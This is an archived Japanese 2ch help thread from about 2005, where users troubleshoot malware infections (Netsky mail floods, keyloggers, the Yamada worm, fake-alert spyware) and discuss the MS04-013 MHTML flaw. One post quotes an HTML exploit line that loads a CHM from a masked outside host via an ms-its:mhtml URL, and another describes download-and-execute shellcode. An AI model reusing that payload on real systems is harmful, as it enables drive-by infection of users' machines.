その中でソフトウェアと言ったら、モデムのファームウェアくらいだ

【使用OS】 WIN XP
【WindowsUpdateしてるか】　
している
【AntiVirusは何を使っているか】
ノートン2005
【ちゃんとUpdateしてるか】
している
【スキャンした結果（ウイルス名・発見場所）】
Trojan.Jasbom
【別のオンラインスキャンしたならその結果は】
してない
【症状を具体的に、分かる限りすべて書く】
症状は特になし。
【何をしたらそんなことになったのか】
価格コムを見た
【これまでにとった措置】
ノートンの対応を処理をとった

学校で、自分のPCのみウィルスに感染しました。
学校はLANでつながっていて？(ゲートウェイで共有接続？)となっていたのですが
学校のインターネットサーバにもウィルスが感染してしまったのでしょうか？
また、感染してしまっている可能性はありますか？
よろしくお願いします。

>>367
大丈夫だと思う。

>>367
しかし、なんで学校のＰＣを私用で使うわけ？
大丈夫ですかって聞く前に教授なり講師に知らせろよ。

>>367
>学校のインターネットサーバにもウィルスが感染してしまったのでしょうか？

今のところ、LAN経由でサーバーに感染させるというのは書いていない。
ただ、「現在のところ」ということだ。

http://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=TROJ_DELF.RM

それに、万一感染してしまっていても、お前にはどうすることも出来ない。
しかるべく「管理者」が対処するだろう。

オレのところでも、価格.コムを見たらしいウイルス感染者がいた。
バスターを入れていたのにどうして？と不思議がっていた。

>367の出来ること。
自分のPCであれば、WindowsUpdateを怠らないことくらい。
学校のPCなら、管理者さんにお任せする以外はない。

>>369
>しかし、なんで学校のＰＣを私用で使うわけ？
PCに関しての情報が見れるサイトは別に見てもいいのです。
授業で使うことがあるので。

>大丈夫ですかって聞く前に教授なり講師に知らせろよ。
明日知らせることにします。

>>368,370
ありがとうございます。
そうですね、ワタシ自身は何もできないのですよね。

インターネットって不思議ですよね。
最初に、サーバーのPCを通して自分のノートPCでサイトを見るのに
根元は感染せず、自分が感染するなんて。
ホント、不思議です。

DQNな私の質問に答えてくださってありがとうございました。

気にしないで。かわいいよDQNでも。

２チャンのスレッドがハッキングされてウイルス感染するってことあるの？
アダルトVのヤフーオークション11スレを開くとVBS-NETWORKとかのウイルスに感染するみたいだが
http://pie.bbspink.com/test/read.cgi/avideo/1107722630/l50

>>373
理論的にはあり得るね。
前々から、2chの専ブラに対するバッファーオーバーフロー攻撃については予言されてたし。
Gzipがらみでもセキュリティホールが空いたこともあったし。

問題は、管理された２ｃｈのスレッドより、２ｃｈ以外の
データー互換の２ｃｈ形式掲示板だろうね。

気軽に読みに行くと専ブラが読み込むんだけど、中身はウィルスを入れ込む
バッファーオーバーランタイプのスレッドを仕込んであったりして。
そこいらへんの緊張感は持ってたほうがいいと思うよ。

補足
例えば、gzip形式のdatファイルを取り込んで、
これをhtmlに整形して吐き出して、ＩＥに渡すわけだけど、
あくまでも専ブラはdatファイルの中身は正しいものとして
処理してるから、ここに単純にスクリプトを入れておけば
感染させることは可能になる。

もちろん、データーチェックで弾かれるのが
ほとんどだから、あり得ないと言うかもしれないけど、
全ての専ブラがチェックをしてる保証は無いわけだしね。

>>374
現在ヤフーオークション11を開くたびにノートンが
ウイルス感染＆削除を宣言します。

>373>376
ここを見れ初心者君
ttp://pc8.2ch.net/test/read.cgi/sec/1115655502/3

おかしなexeを起動したら夏色こみゅにけーしょんって言われて
IEとoutlook以外のexe全部消されました(´ﾟ∀ﾟ`)ｳｪﾊﾊﾊﾊ

[email protected]関係のウィルスメールが大量に来てるんだけど・・・
なんかやばいのかな。

【使用OS】
winＸＰ
【WindowsUpdateしてるか】
していない
【AntiVirusは何を使っているか】
ノートンシステムワーク２００３
【ちゃんとUpdateしてるか】
今年の３月まではしていた
【症状を具体的に、分かる限りすべて書く】
ネットをしようと回線をつないでしばらくインターネットをしていると急にメールを大量に送りだします
ネットを切断すると送るのが止まります
メールソフトはＯＥを使っているんですが送信済みフォルダには
送った形跡がなにも残っていません
メールを急に送り出す時にＯＥは起動しないのでＯＥから送ってないのかもしれません
【何をしたらそんなことになったのか】
昨日急になったので原因はいまいちわかりませんが
ノートンを切ってあるのを忘れてそのままアダルトサイトを見たのがもしかしたら原因かもしれません
それか最近メールで外国語の件名で添付ファイルがあるものがきているので
それが原因かもしれません
でもメールの添付ファイルを開いた記憶はないです
【これまでにとった措置】
シマンテックで配布しているW32.Sober[B-G.Ｉ.Ｌ.N.O]RemovalToolと
W32.Netsky　FixToolというのを試してみましたが両方とも感染していないという結果でした

よろしくおねがいします

>>380
いずれにしても、正式版を買ってからだろうね。話は。

>>380
なんで「急にメールを大量に送りだ」してるのが分かるんだ？
つうか、メール送りまくってるのが分かってるのなら
さっさとネットワークケーブル引っこ抜け。
人に迷惑かけない状態にした後でネットに繋ぐ手段見つけて相談しる。
ネットカフェでも携帯でもいいから。

>>382
急にシマンティックのメールスキャンのようなものが始まるんです
それが大量に始まって１００％になって送っている（のかな？）のや
エラーとなって送れませんでしたというのがでます
始まってしまったら即刻切断しています

>379
ウチにも大量に届いてる．何なんだろ？

XP使ってるパソコン初心者です。３日前ぐらいから
winny2使ってエッチなファイルおとしてウイルスに感染しちゃいました。
フリーのAVGとかいうソフトでスキャンしたところ、１２４７個の
ファイルが感染してます。ウイルス名は『Win32/Parite』とかいうやつで
どうもexeファイルほとんど感染しちゃってます。

それでAVGとかいうやつで駆除してるんですが、一個一個修復ボタン
を手動で押さなきゃいけないみたいなんで、大変なんです。だからといって
一気に削除するのも怖いし・・この手のウイルスを
自動的に削除じゃなくなるだけ修復してくれる
ようなウイルス対策ソフトあります？？良かったら教えてください
それとも、もうこれだけ感染しちゃってると手遅れなのかな・・＾＾；

> winny2使ってエッチなファイルおとしてウイルスに感染しちゃいました。
自業自得

>>385
俺も自業自得だと思うが、ファイル共有していて
オンラインスキャンしてない方がありえない。

【使用OS】 XP PRO SP2
【WindowsUpdateしてるか】 しています
【AntiVirusは何を使っているか】 eTrust Antivirus 7.0
【ちゃんとUpdateしてるか】 しています
【スキャンした結果（ウイルス名・発見場所）】 検出せず
【別のオンラインスキャンしたならその結果は】
バスターのオンライン、NOD32体験版でチェックいずれも検出せず。ノートンで2chログが反応しただけ。
Spybotでもスキャンしましたが何も見つからず。

【症状を具体的に、分かる限りすべて書く】
2〜3日前から15分置き位にrundll.exeがmembers.chello.nlにFTPで送信しようとしてるとOutpostが警告を出す。

【何をしたらそんなことになったのか】
推測ですが串を試していたときl飛ばされたページにchelloのロゴが表示されたのでmembers.chello.nｌ関係の
ページに飛ばされこのときに何かあったのかと。

【これまでにとった措置】 Outpostで防いでいます
【その他の質問】
Outpostを入れたのが最近でその前から送信していたのか上記の時にそうなってしまったのかが分かりません。
トロイのWINIS.EXE関係かとも思ったのですがレジストリ、システムディレクトリとも痕跡がありませんし
スキャンしても何も見つからないのでこれではないと思います。
members.chello.nｌ　rundll.exeでぐぐってみてもドイツ語？かなにかのページが2件ほど見つかるだけで
情報がありません。
スキャンしても何も見つからず、だけれど何かを送信しようとしているので気味が悪いですし、
rundll.exe自体をブロックしているのでFTP関連で支障が出ないか心配です。

超初心者ですがお教えください
「MS04-13の脆弱点に対するパッチが適用されている場合は感染しません。」
とかよく書かれていますが、そのパッチが適用されたかどうかは
どうすればわかるのでしょうか？

>>388
SP2なのでインターネットオプションのプログラムタブ
アドオンの管理でIEに変なものが組み込まれていないかをまず確認
system32フォルダ内にあるのそれらの登録されている.dllを全部調べてみる
プロパティから作成日時やマイクロソフトのファイルかどうかで判断する

異常がなさそうなら、rundll.exe経由で起動されてそうなので、
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
レジストリのこの場所を確認してみる

>>379
メールアドレス等の個人情報をばらまいてるなあ。

>>390
rundll.exeを見てみるとタイムスタンプが5月18日と昨日の日付になっていたので、あれ？と思い
バイナリエディタで覗いてみるとArdamax Keyloggerという記述がorz
それ関連のdllも見つかりました。
どうやらキーロガーを仕込まれてるっぽいです。
しかし相変わらずスキャンしても反応無し・・・・・・

ブラウザのアドオンでよく分からないのが
ブラウザ拡張で名前が「リサーチ」　関連ファイル無し。発行元も空欄。
です。

追記
すいません、最初に書いておいた方が良かったですね。
レジストリのスタートアップ関連は真っ先に調べました。
すべて把握済みの物で怪しい物はありませんでした。

何度もすいません。
HijachThisで調べたら「リサーチ」はExcelの拡張でした。

>>388
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
じゃあ、こっちにあるかもしれないね

昨晩から、[email protected]のアドレスで大量のウイルスメールが届いています。
丸善で何かあったのかな・・・

>>396
ウェブサーバの感染か、丸善のメールアドレスが残っているサイト閲覧者のウィルス感染か？
後者だったらしばらくの間は届くだろうね

丸善のメルマガ配信停止したけど、まだウイルスメールが[email protected]から届きます

>>398
送信元のIPアドレスをWHO.ISで調べて見て
ソースを表示して、recieved fromのところね

>>398
だから、丸善から届いてるんじゃなくて、ウィルスが丸善を装って出してきてるんだよ。
本当の感染者がウィルスに対処するまで届き続けるよ。
ウィルスの種類が違うかも分からないが、以下参考に

【差出人】WORM_NETSKY【詐称】
http://pc8.2ch.net/test/read.cgi/sec/1080741342/

Received: from mailgate2.maruzen.co.jp by gatekeeper2.maruzen.co.jp

丸善のサーバーからウイルスメールを発信してるってことなのかな

>>401
IPアドレスがどこに所属しているものなのか調べて推測するしかない
まあ、大体は偽装されていないと思うよ

>>401
自分のIPアドレスを隠して、残りをきちんと貼れよ。
あと、名前欄も誰か分かるように入れとけ。

>>389
超初心者なら、WindowsUpdateにアクセスして
「優先度の高い更新プログラム」（XPの場合の表示）が全くない状態にしておけ。
それからOfficeアップデート、MSNメッセも使ってるならアップデート。
それで該当パッチも含めて現時点でマイクロソフトがリリースしてる
危険なセキュリティホールは大方潰せるはず。

>>389
いやすまん、更新云々じゃなくて適用されてるかどうかってことね。
WindowsXPはSP2に含まれてるから、SP2にしてれば問題無し。
http://support.microsoft.com/kb/811113

XP SP2でないなら、ここの「更新プログラムが正しくインストールされたかどうか確認する方法」を参照。
ttp://www.microsoft.com/japan/technet/security/bulletin/MS04-013.mspx

>>396-403
電子メール大量配信についてのご報告とお詫び
http://mis.maruzen.co.jp/cgi-bin/mis2005?Cgifrom=m2-gud-11

丸善が発信元だったようだな。

＞弊社のサーバがウィルス感染した事実はございませんので
丸善からウィルスメール届いたという人は、使ってるアンチウィルスと検出名書いてくれないかな。

Outlook Express 用の累積的な修正プログラム (837009) (MS04-013)

脆弱性の詳細
MHTML URL のプロセスの脆弱性 - CAN-2004-0380:
特別な細工がされた MHTML URL が処理される方法に、リモートでコードが実行される脆弱性が存在します。
それにより、Internet Explorer のマイ コンピュータのセキュリティ ゾーンで攻撃者の HTML コードが実行される可能性があります。
これにより、攻撃者によって該当のコンピュータの完全な制御が取得される可能性があります。

「MHTML URL のプロセスの脆弱性」のよく寄せられる質問 - CAN-2004-0380:
どのようなことが起こる可能性がありますか?

これは、リモートでコードが実行される脆弱性です。
攻撃者にこの脆弱性が悪用され、
Internet Explorer のマイ コンピュータのセキュリティ ゾーンで任意のコードが実行される可能性があります。
攻撃者はマイ コンピュータ ゾーンで HTML コードを実行し、影響を受けるコンピュータの完全な制御を取得する可能性があります。
攻撃者は、そのコンピュータ上でプログラムのインストール、データの表示、変更、削除、完全な資格情報を持つアカウントを新規で作成するなど、
任意の操作を実行する可能性があります。

MHTML URL とは何ですか?
MHTML とは、 MIME Encapsulation of Aggregate HTML (英語情報) の意味で、電子メール メッセージの本文内の
HTML コンテンツを送るために使用される MIME (Multipurpose Internet Mail Extensions) 構造を定義するインターネット標準です。
Windows の MHTML URL ハンドラ は、Outlook Express の一部で、アプリケーション内でレンダリングする MHTML 形式でエンコードされた文書を有効にする、
URL の 1 つの種類 (MHTML://) を提供します。
そのため、Internet Explorer などのアプリケーションは、Outlook Express を使用して、MHTML 形式でエンコードされた文書を処理します。

この脆弱性により、攻撃者は何を行う可能性がありますか?
攻撃者はこの脆弱性を悪用し、ユーザーのコンピュータ上にアクセスし、任意のコードを実行する可能性があります。
このようなコードは、現在ログオンしているユーザーのセキュリティ コンテキストで実行される可能性があります。

攻撃者はどのようにこの脆弱性を悪用する可能性がありますか?
リモートでコードが実行される脆弱性が存在し、特別な細工がされた MHTML URL が処理される際に、
Internet Explorer のマイ コンピュータのセキュリティ ゾーンで攻撃者の HTML コードが実行される可能性があります。
これにより、攻撃者は該当のコンピュータの完全な制御が取得される可能性があります。
Web ベースの攻撃シナリオで、攻撃者がこの脆弱性を悪用するには、この脆弱性を悪用するための Web ページを含む Web サイトをホストすることが必要条件となります。
攻撃者は、ユーザーをそのような悪質なサイトに強制的に訪問させるようにすることはできません。
その代わり、攻撃者は通常、攻撃者のサイトに移動するリンクをユーザーにクリックさせることにより、そのような Web サイトにユーザーを訪問させるように誘導します。
また攻撃者は、この脆弱性を悪用するように設計した HTML 形式の電子メール メッセージを作成し、ユーザーがそのメッセージを表示するように誘導する可能性があります。
ユーザーが攻撃者の Web サイトを訪問するか、または攻撃者が作成した HTML 形式の電子メール メッセージを表示すると、ユーザーのコンピュータのマイ コンピュータ ゾーンで、
攻撃者の任意の HTML コードが実行される恐れがあります。
攻撃者はこの脆弱性を悪用し、ユーザーのコンピュータ上のファイルにアクセスし、任意のコードを実行する可能性があります。
このようなコードは、その際にログオンしているユーザーのセキュリティ コンテキストで実行される可能性があります。

更新プログラムは何を修正しますか?
この更新プログラムは、Outlook Express が MHTML URL を処理する方法を変更することによってこの脆弱性を排除します。

>>408-409
おもいっきり詩ね

>>406
報道ではウィルス付きメールとされてるのに、それには触れてないね。
丸善、メルマガ登録者にウイルスメール送信
http://www.asahi.com/national/update/0519/TKY200505190173.html

ああ　やだ
日本全国　厨IT企業続出！
管理出来ないんだから事業なんて興さなきゃいいのに！

丸善がML用のメアドを１つ作っていて，
外部からもそこへ送れば登録者全員に
一斉配信されるようになっていたらしい．
※これが元凶

おそらく外部のnetsky.pに感染したマシンから，
そのアドレスへウィルスを発信し，
それが丸善経由で登録者へ，
登録者側の一部のサーバーからのbounceも
またそのメアド向けに出されるわ，
受け取ったヤツが苦情や登録解除依頼を
送り返したり云々
・・・・でこの騒ぎになったと思われ．

>>413
うん　素晴らしい
その話を仮定すると少なくとも3回はウィルスチェックされる可能性はあったわけだ
まず、リモートから送る際のパソコン内部でのチェック、
次に、メールサーバ側での受信時、
そして最終関門であるメールサーバーからの配信時、
まさか、また全部例のソフトメーカーか？

>>413
↓これと同じようなものかな。
武蔵野市がウイルス・メールを誤配信，感染報告はゼロ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050317/157600/

【社会】大手書店「丸善」がウイルスメールを配信
http://news19.2ch.net/test/read.cgi/newsplus/1116483190/

<script language="JavaScript">
</script>
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.*****.biz//adverts//35//main.chm::/main.htm" type="text/x-scriptlet"></object>
</body>
</html>

そして、ここへ繋がる

>>417
またお前か。

>>414
丸善のメール配信がどういうシステム構成か、詳しいことは分からないけど・・・
そもそもの問題は、外部の不特定アドレスから来たメールを
そのままメーリングリストに再配信するような大穴開いた設定してたことだと思われ。

セキュリティソフト以前の問題なんだから、そこまでカバーしろってのも
セキュリティベンダーに対して酷な話じゃないかな。

>>419
来たメールをウィルススキャンするだけでいいはずだから、
セキュリティベンダーの問題じゃなくて、丸善の問題だろうね。

丸善から届いたメールです。

----------------------------------------------------------------------------
InterScan により、ウイルス感染ファイルが検出されました。

送信者 = [email protected](←伏せ字に変更しました。見覚えのない誰かのアドレスです)
受信者 = [email protected]
件名 = Re: Delivery Protection
検出日時 = 2005/05/19 3:46:19
検索エンジン/パターンファイル = 7.510-1002/2.635.00

ウイルス検出時の処理：
添付ファイル details.zip には WORM_NETSKY.P ウイルスが含まれています。InterScanにより削除されました。

受信者への警告！InterScan

>>421
乙と言いたいところだが、ヘッダもｷﾎﾞﾝﾇ

>>421
ウィルスメールがばら撒かれたんじゃなくて、ウィルス警告メールがばら撒かれたんだな。

avastってデスクトップPC専用なの？
ノートPCには使えない？

>>417
　　　　　 .l''',!　　　　 .r-、　　　　　 .,､�＝@　　　　　　.l''',!　　　　 ./ｰ､,,,_　　　　 .r-，
　　 .广''''″.¨ﾞﾞ!　 .,,,丿 {,,､､，　　.ｖ-lﾞ .!-ｒ/i､　　广''''″.¨ﾞﾞ!　　　.!､,　　lﾞ　　　　 | .｝　,��
　　 .ﾞl---， ぃ"　 .|　　　　 .|　　 .|　　 _,,{ﾞl .ヽ　 ヽ--i､ .ぃ"　　.,,,,,,,,二ｉ"　　 .,..-" .ヽl、ﾞl
　　 r---┘.―'i､　"',! ./ﾆﾆﾆ、　 ￣| .Ｌ,,,,,ﾞl,,i´ .r---┘.―'i､　 .|　　　 :,!　　 |　　　　.l　.|、
　　 |＿＿　._,,,,｝　　ﾉ .| |　　 lﾞ　　.／　　　ﾞ'i､　.|＿＿　._,,,,｝　　"''''ﾂ ./　　　"''ﾄ .|ﾞi､ ||、ﾞl
　　　.,―-" |　　　 .ﾉ .lﾞ `"ﾞﾞﾞ'"　 ,i´,�〕ﾞﾞ^'i､ |　　.,―-" |　　　　 ../　 `i､　　　 lﾞ ,lﾞ |　|.ﾞl.,ﾉ
　　 .lﾞ .,,,,,,　.＼　　.lﾞ .lﾞ ,，　　　 .lﾞ .|.｝ |　　| .|　 / .,,,,,,　.＼　　 ../　.,.i､ |　　　 lﾞ .lﾞ .| .,! .゛
　　 |　し,,lﾞ .、 ﾞ,!　,lﾞ ,lﾞ.i".ﾞﾞ'''''"!　ﾞl .″.|.,!'''゛ lﾞ　 | .lﾞ,,,,lﾞ .、 ﾞ,!　,/｀／ .| ."'ﾞﾞl　./ .lﾞr┘,lﾞ
　　 .ﾞl,　　.,/｀∪　 ﾞ〃 .`ｰ--丿　.ﾞ'--ヽ{,,,.／　 .ﾞl,,　　_/｀∪　.ﾞl.,i´　 .!,_,,,／ .lﾞ../ |　.,i´　

　　

丸善ﾜﾛｽｗｗｗｗ
ﾍﾀﾚ管理者どもはとっとと氏んどけｗｗｗ

>>404
>>405
ありがとうございます。XPのSP2になっておりました。
WindowsUpdateでｲﾝｽﾄｰﾙの履歴を見ることもできました。
重ねて感謝いたします。

Internet Explorerでバッファオーバーフローが発生します。
さらに、ローカルマシンにリモートファイルをダウンロードし、
そのファイルをローカルファイルに保存し、
さらにダウンロードしたファイルを実行するように指示するシェルコードが実行されます。

>この際のシェルコードってのが、
>バッファオーバーフローが発生した時のリターンアドレスに仕込まれるプログラムコードになります。
>そして、リターンアドレスは常に決まっていて固定なので、
起こす前にメモリ上にセットしておけばいいわけです。

以上

今、ネットに接続してヤフーのニュースを見てオークション見てページを閉じたら、
デスクトップに「~」って名前のファイルがいきなり出てきたんだけど･･･
ウィルスに感染したらこんなファイルができることとかってある？
よくわかんないからとりあえず捨てたんだけど･･･

>>429
WinFAQにある

>>430
さんくす！
単なる勘違いでしたねｗ

WinFuCkにある。

自動解凍のファイルだと思ってダブルクリックしたら、ウイルスだったようで
HDDの残り容量が20Gちょい→いっきに30Mになってしまい、このままでは電源落とすと
OSが起動しなくなりそうです・・・。どこかにファイルを大量コピーされたのだと
思うのですが、このようなタイプのウイルスの場合どうやって大量コピーされたファイルの場所を
探せばよいですか？OSはXPのホームエディション、セキュリティはノートンインターネットセキュリティ2005
両方ともUPは最新までしてあります。

>>433
とりあえず、スキャンしてみたら?

それがドライブ全部ノー�dでスキャンしたんですが、引っかからないのですよ・・・

>>435
ｵﾝﾗｲﾝｽｷｬﾝは無理かね?

すいません・・・色々フォルダ見てたら自分の目にソレらしきファイルがスキャンされましたorz
1個1Gのjpgとか・・・

>>437
>自分の目にソレらしきファイルがスキャンされました
慌てるなw スキャン出来る目を持ってて何より何より

ウイルスに感染したみたいで、ＭＣＡｆｅｅのウイルススキャンで
スキャンしてみたのですが、ウイルスなし、と出ます
ＭＣＡfeeのスキャンではひっかからないウイルスなのでしょうか…
ちゃんとしたウイルススキャンを買ってきてスキャンしたほうがいいのでしょうか…

>>439
他のは試してみたのか？ｼﾏﾝﾃｯｸとか。

インターネットウイルルスキャンとかですか？
今からやってみます

>>441
そのexe実行した日付でファイルの検索をかけてみたら？

>>442
「システムの復元」使う手もあるな。

すみません、ＰＣの事全然わからないんですけど
今とりあえずシマンテックのオンラインスキャンやってるんですけど
>>442
>>443
ファイルの検索ってウインドウズのメニューにある「検索」ですよね（ファイル名をいれて検索するやつ）
それはわかったんですが何を検索すればいいのか
システムの復元もやった事あるのですがそれからどうすれば…

というか>>439はどうしてウイルスに感染してると判ったんだ？

MCafeeが反応したからです
それで、スキャンしても見つからないからおかしいと思ったんです

さっき（といっても１時間以上前）この板の☆☆トロイの木馬☆☆2台目
というスレを開いたら、Bloodhound Exploit6というウィルスに感染したと
ノートン先生が警告した。
一回目のスキャンで検出したけど検疫も削除もできず、慌ててインターネット
一時ファイルを削除してもう一度完全スキャンをしたら検出されなくなった。
今昨日配布されたばかりの定義ファイルをダウンロードしたところだけど、
ウィルスは消えたのだろうか？それともまだ残ってるのか…。

>>447
ノートンの誤反応
スレにあるウイルスコードに反応しただけだから気にすんな

>>446
常駐シールドが発見して削除したんだろう？
それなら実行されない仕様だからその悪質なファイルが実行されなかったんだから
システムに感染してインストールなどされていないから発見などされない
通常Temporary Internet Files以外から発見された場合は、
ウィルスにシステムが犯されていると判断してよい

>>446
もう一つ追加
Tempフォルダ内だけにウィルスが一時展開された状態で残っている状態もあるが、
通常レジストリ内にそのパスで実行される記述がない場合は、
システムに感染していないから削除すれば支障はない

そうなんですか…それなら一安心なんですが
今シマンテックのスキャン見たら終わってて１１個のファイルが感染してました

コンピュータは何らかの既知のウイルスまたはトロイの木馬に感染しています。

駆除方法がわからないんですけど、感染ファイルを削除すればいいのでしょうか

>>451
ノートンはTEXTファイルにも反応するから、Temporary Internet Filesを全部削除後に
もう一度スキャンしてみなさい

>>447
そんな時はブラウザの窓を全部閉じてから削除すればいい

やってみます

>>448
そうだったのか…。
LoveLetterあたりはそういうのがあると聞いてシカトしてたけど、
今回のは初めてだからあせった。
なんせおととい職場のPCサイト閲覧だけで感染させて、昨日やっとこ
直してもらったばかりだから…orz
価格コムウィルスじゃないよ。

>>452
スキャン終わりました
感染ファイル０だったのですがこれからどうすればいいのでしょうか

>>456
感染ファイルが無かったのなら万事解決。おめでとう。

そうですか、わかりました
これで安心してインターネットができます
ありがとうございました

山田ヲチスレで、山田感染者のSSを見たんですけど、
ZoneAlaemが入ってたり、NIS2005が入ってたりしてるんですが、
これらFWソフトでも感染後の不正アクセスは防げないもんなんですかね。
詳しい人教えてください。

>>459
ヲチスレの>>1にある、まとめサイトに載ってる（´・ω・）ｽ 

>>459
山田の巧妙なところは一切インターネットアクセスをしないところ。
つまり、アップフォルダにファイルをコピーするだけだから。
インターネットにアクセスするp2pソフト自体は既にユーザー自身が許可してるから、検知しない。

だから、山田にはＮＩＳのFWもZonも無力。

>>461
>>459は「感染後の不正アクセス」の話だと思う（´・ω・）ｽ
どっちにしろ、板違いｽﾏｿ（´・ω・）ｽ

>>461
そうなんだ。
ってことは、P2Pソフト持ってない人はFW入れとけば大丈夫ってこと？

すみません、ヤマダウイルスの事で質問です。
ヤフーの記事に

Windows 2000／XPの場合はコマンドプロンプトから「netstat -a」を実行し、
httpのLISTENING表示がないか確認するのがよいだろう。
もしこうした文字列があれば、Webサーバの類が動作していることになる。

とあったのですが、これはｈｔｔｐの横に何らかの文字があったら
全て感染しているという事なんでしょうか？
感染していない場合、している場合はどのように表示されるのか教えて頂きたいのですが。

ヤマダに関してはdown板が一番詳しい。down板へ行くとよろし。

>>464
日本語不自由すぎ。
>>462の最後の行。

なんでウィルスのこと訊くのがスレ違いなのよ？
P2P使ってないやつでもこんだけ山田の書き込み見せられりゃあ不安になるがな。

>>463
>だから、山田にはＮＩＳのFWもZonも無力。

山田で投入されるhttpサーバプログラム名は、svchost.exeで
あるため、大抵のNISユーザーは通信を「許可」してしま。

もし、自分が不意に svchostが通信しようとしています。許可しますか？
と聞かれて、しかもそれが高危険度で無いなら、許可にしてしまうだろう。

>>469
山田＋キンタマもあるから、httpサーバーで内部公開する上に、
ｐ２ｐに内部ドキュメント移すってのもある。

>>469
そういうことか。ありがとう。

でも、ZAだったらフルパスで警告でるから気づくことができるね。
安心しました。
自分のPCの中、あんなふうに晒されてるのみると
P2Pつかってなくても寒気がしたもので。
どうもありがとうでした。

>>471
それが、svchost.exeが投入されるパスが
widowsのシステムパスなので、区別するのは難しい。
NISなら、本来のsvchost.exeは自動設定が推奨されているので、
それで判別できる。

しかし、いずれにしてもフォルダを簡単に開かないことだ。

ｎｙしなけりゃ、いいんでね？

>>473
当然だ。今流通しているｐ２ｐにはそれ自体に
すでにddos攻撃に類するコードが内在されていることが
判明しているものも多い。特定、共有ファイルが現れた時に
指令を送れるものだ。日本では流行らなかったが。

えらい症状の多いウイルスに感染してかなりこまっています･･･。症状はOSが起動されてデスクトップになったときに
1:「プログラムがビジー状態です。」という真っ青で中くらいの×ボタンのない偽エラーメッセがたくさんでる
2:ゴキブリや蝿の写真が画面内を這い回る
3:ウインドウズの終了メニューを出したときのように画面が灰色になって操作できなくなる(ALT+Tabで下のツールバーだけは触れる)
4:マイドキュメントの中に2chの顔文字が名前に入ったやたら重いjpgがドライブ一杯までコピーされる
といった症状です。起動するたびにすばやくエラーメッセを消したりしないとほぼフリーズのような状態になってしまいます･･･｡
OSはXPのホームエディション、ウイルスソフトはノートンインターネットセキュリティ2005。スキャンは感染する前の日に1回と
感染後にも1回行いました。OS、ノートンともにUPで最新Verです。どうかご教授お願いします･･･。

>>475
OKWeb：ウィルスに感染してしまいました。
ttp://okweb.jp/kotaeru.php3?q=1372550

>>476
ありがとうございました。無事直りました。

>>475さんと同じ症状なのですが

システムの復元が無効にされたまま
有効にしようとすると↓のようなエラーが出てできません・・・
「１つ以上のドライブを有効または無効にしようとした時にエラーが発生しました
、再起動して再試行してください」←再起動後も無理でした

どなたか解決策はないでしょうか？

【使用OS】 XPSP1
【WindowsUpdateしてるか】 してます
【AntiVirusは何を使っているか】 使ってません
【その他の質問】 コマンドプロンプトにてnetstat -oで確認したところ、
　　　　　　　　　　　PID 1060 つまりsvchostでESTABLISHEDとなってました。
　　　　　　　　　　　大丈夫でしょうか？問題があったら解決方法をお願いします。

>>479
まずオンラインスキャン汁。

感染してしまいました・・・ＴＴ
長くなりそうなので、ひとまずスキャン中ですが現状を書かせていただきます。

【使用OS】 ＷｉｎＸＰ
【WindowsUpdateしてるか】 2ヶ月くらいしてません・・・
【AntiVirusは何を使っているか】 ノートン2002
【ちゃんとUpdateしてるか】 ノートンは今朝したばかりです
【スキャンした結果（ウイルス名・発見場所）】 現在スキャン中です。
【別のオンラインスキャンしたならその結果は】 まだしてません
【何をしたらそんなことになったのか】ある画像掲示板を開いたとたん画面が固まって1分後くらいに「コピーしています」
　　　　　　　　　　　　　　　　　　　　　　　と出たので慌ててＬＡＮケーブルを抜きました。
【これまでにとった措置】 何か処理をしていたのであわててＬＡＮケーブルを抜いたのと、ノートンです。

【症状を具体的に、分かる限りすべて書く】
見覚えの無いアイコンが３つデスクトップにあります。
　FreeXXX（女の人の顔の一部のアイコン）
　Spy wara Avenger （青くＡの文字の丸いアイコン）
Virus Hunter Security（緑でＶの文字の丸いアイコン）
この↑３つです。

それとノートンをかけている最中ですが、定期的にＩＥが立ち上がり
tp://www.clicksearchclick.com/free.php?aff=8を表示しようとします。
ＬＡＮケーブル抜いたままなので表示はされませんが。

もうひとつ、デスクトップが青くなり以下の文字があります。
Security Warning
A fatal error in IE has occured at 0028:C0011E36 in VXD VMMC00010E 36.
Error was caused by Trojan - Spy. HTML.Smitfraud.c
*System can not function in normal mode.
Please chech you security settings.
*Scan your PC eith any avaliable antivirus/ spywara remo program to
fix the problem.
と白で書かれています。

【その他の質問】
まだスキャン中ですが、スキャンが終わったらＬＡＮケーブルをつなげてしまっても
よいのでしょうか？

スキャンが終わりましたら、ウィルスの種類等の記載もします。
長くて申し訳ないです・・。

>>481
こちらへ

アダルトサイト被害対策の部屋
スパイウェア除去ウィザード − 順を追って作業を行うことで問題解決（たぶん）
ttp://www.higaitaisaku.com/removewz01.html

>>483　ありがとうございます。見てみます。
でもアダルトサイトじゃないのですが・・・＾＾；

>>484
googkle？

エロ助でも同じような質問があった。
>481
＞画像掲示板
と言ってるところからDARK LOLITASと見た
＞clicksearchclick.comに飛ばされるという症状とサイトは真新しいマルウェアか？
デスクトップのやつは後日キャプってきます。

>>484
いえ、オンラインゲームのＳＳ掲示板です。
今もノートン中ですが、ぞくぞくと検出される・・・・orz

>>487
ご愁傷様。
でもなんでノートン使ってて未然に防げなかったんだろうね。

いつからか、
AutoProtectが無効になっているのですが、これが原因でしょうか・・・？

>>488
update してなかったからだろう。

>>490
ノートンのうｐＤａｔｅはしてたのですが、やっぱりＷｉｎのＵｐＤａｔｅもしないと意味が無いのでしょうか？

>>491
両方必要です。

エロ助スレで困っている人がいるので後で来る。

>>491
windowsのupdateは常識だよ。
これしないと同じ繰り返しになる。

みなさまありがとうございます。
これからは必ずＷｉｎｄｏｕｗＵｐｄａｔｅをちゃんとしますorz

ちなみにスキャン終わりました。
以下のものが検出されました。

Trojan.Desktophijack
TrojanHouse
Downloader.Trojan
TrojanHouse
Downlcader.Trojan
Backdoor.Haxdoor.D
Backdoor.Haxdoor.D
Backlcdoor.Tofger
Backdoor.Tofger
Trojan.Anicmoo
Download.Trojan

です。

>>494
凄い量！OSの再インスコした方が良いような気が。

このうち、修復した感染数が0個
検疫した感染数7個

で、まだ4個感染が残っています。
こういう場合はどうすればいいでしょう？まだＬＡＮケーブルはつなげないほうがいいのでしょうか？

質問攻めで本当に申し訳ありません。

>>496
で、まだ4個感染が残っています。

